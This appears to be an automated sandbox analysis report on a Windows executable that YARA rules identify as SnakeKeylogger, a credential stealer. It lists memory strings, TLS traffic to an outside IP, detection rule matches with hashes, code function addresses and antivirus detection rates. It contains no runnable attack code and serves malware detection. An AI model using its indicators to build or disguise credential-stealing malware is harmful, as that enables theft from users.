                Source: XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20Y&
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002C62000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002C53000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002C5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lBNr
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49689
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
                Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
                Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
                Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49689 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49700 version: TLS 1.2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.XFo9jVGyLQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.XFo9jVGyLQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 1.2.XFo9jVGyLQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: XFo9jVGyLQ.exe PID: 7020, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: XFo9jVGyLQ.exe PID: 7072, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_056B6F900_2_056B6F90
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_056BD3E40_2_056BD3E4
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_0766E6F80_2_0766E6F8
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_0766CD800_2_0766CD80
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_07666D980_2_07666D98
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_07667CB80_2_07667CB8
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_07665B880_2_07665B88
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_07669F700_2_07669F70
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_07669F800_2_07669F80
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_0766A5400_2_0766A540
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_07668D000_2_07668D00
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_07668D100_2_07668D10
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_0766D4C00_2_0766D4C0
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_07664C990_2_07664C99
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_07665B770_2_07665B77
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_0766A3700_2_0766A370
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_07669B500_2_07669B50
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_0766EBD00_2_0766EBD0
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_07667BB70_2_07667BB7
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_0766A3800_2_0766A380
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_076663990_2_07666399
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_0766D2680_2_0766D268
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_0766D0180_2_0766D018
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_0766E0180_2_0766E018
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_0766A0E10_2_0766A0E1
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_0766A0F00_2_0766A0F0
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_078764180_2_07876418
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_07875FE00_2_07875FE0
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_07877F490_2_07877F49
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_07877F580_2_07877F58
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_07875BA80_2_07875BA8
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_07877B1D0_2_07877B1D
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_07877B200_2_07877B20
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_010C71181_2_010C7118
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_010CC1461_2_010CC146
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_010CA0881_2_010CA088
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_010C53701_2_010C5370
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_010CD2781_2_010CD278
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_010CC4681_2_010CC468
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_010CC7381_2_010CC738
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_010CE9881_2_010CE988
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_010C69A01_2_010C69A0
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_010CCA081_2_010CCA08
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_010CCCD81_2_010CCCD8
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_010CCFAB1_2_010CCFAB
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_010CF9611_2_010CF961
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_010CE97B1_2_010CE97B
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_010C29EC1_2_010C29EC
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_010C3AB11_2_010C3AB1
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_010C3E091_2_010C3E09
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_067396681_2_06739668
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_06731FA81_2_06731FA8
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_06739D901_2_06739D90
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_06732A901_2_06732A90
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_067318501_2_06731850
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_067351481_2_06735148
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_0673D6701_2_0673D670
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_0673D6601_2_0673D660
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_0673DF201_2_0673DF20
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_0673DF111_2_0673DF11
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_0673E7D01_2_0673E7D0
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_0673E7C01_2_0673E7C0
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_0673E7CF1_2_0673E7CF
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_06731F981_2_06731F98
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_067394481_2_06739448
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_06739C3E1_2_06739C3E
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_0673EC281_2_0673EC28
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_0673EC181_2_0673EC18
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_0673F4D81_2_0673F4D8
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_06738CC01_2_06738CC0
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_0673F4C81_2_0673F4C8
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_06738CB11_2_06738CB1
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_0673CDC01_2_0673CDC0
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_0673CDAF1_2_0673CDAF
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_0673D2181_2_0673D218
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_0673DAC81_2_0673DAC8
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_0673DAB91_2_0673DAB9
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_06732A801_2_06732A80
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_0673E3781_2_0673E378
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_0673E36B1_2_0673E36B
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_06730B301_2_06730B30
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_06730B201_2_06730B20
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_0673F0711_2_0673F071
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_067318411_2_06731841
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_067300401_2_06730040
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_067300071_2_06730007
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_0673F0801_2_0673F080
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_0673F9301_2_0673F930
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_067351381_2_06735138
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_0673F9231_2_0673F923
                Source: XFo9jVGyLQ.exe, 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs XFo9jVGyLQ.exe
                Source: XFo9jVGyLQ.exe, 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs XFo9jVGyLQ.exe
                Source: XFo9jVGyLQ.exe, 00000000.00000002.874252399.00000000014BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs XFo9jVGyLQ.exe
                Source: XFo9jVGyLQ.exe, 00000000.00000002.881670890.0000000007E30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs XFo9jVGyLQ.exe
                Source: XFo9jVGyLQ.exe, 00000000.00000000.863641256.0000000000F30000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAPWe.exeB vs XFo9jVGyLQ.exe
                Source: XFo9jVGyLQ.exe, 00000000.00000002.875697487.000000000340B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs XFo9jVGyLQ.exe
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs XFo9jVGyLQ.exe
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3335368575.0000000000B37000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs XFo9jVGyLQ.exe
                Source: XFo9jVGyLQ.exeBinary or memory string: OriginalFilenameAPWe.exeB vs XFo9jVGyLQ.exe
                Source: XFo9jVGyLQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.XFo9jVGyLQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.XFo9jVGyLQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 1.2.XFo9jVGyLQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: XFo9jVGyLQ.exe PID: 7020, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: XFo9jVGyLQ.exe PID: 7072, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: XFo9jVGyLQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.raw.unpack, m---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, zo37rSQVkQ5Zi1XDwG.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, zo37rSQVkQ5Zi1XDwG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, zo37rSQVkQ5Zi1XDwG.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, E07llS6X8rtulXNqpw.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, E07llS6X8rtulXNqpw.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, E07llS6X8rtulXNqpw.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, E07llS6X8rtulXNqpw.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, zo37rSQVkQ5Zi1XDwG.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, zo37rSQVkQ5Zi1XDwG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, zo37rSQVkQ5Zi1XDwG.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, zo37rSQVkQ5Zi1XDwG.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, zo37rSQVkQ5Zi1XDwG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, zo37rSQVkQ5Zi1XDwG.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, E07llS6X8rtulXNqpw.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, E07llS6X8rtulXNqpw.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XFo9jVGyLQ.exe.logJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeMutant created: NULL
                Source: XFo9jVGyLQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: XFo9jVGyLQ.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002D43000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: XFo9jVGyLQ.exeVirustotal: Detection: 75%
                Source: XFo9jVGyLQ.exeReversingLabs: Detection: 73%
                Source: unknownProcess created: C:\Users\user\Desktop\XFo9jVGyLQ.exe "C:\Users\user\Desktop\XFo9jVGyLQ.exe"
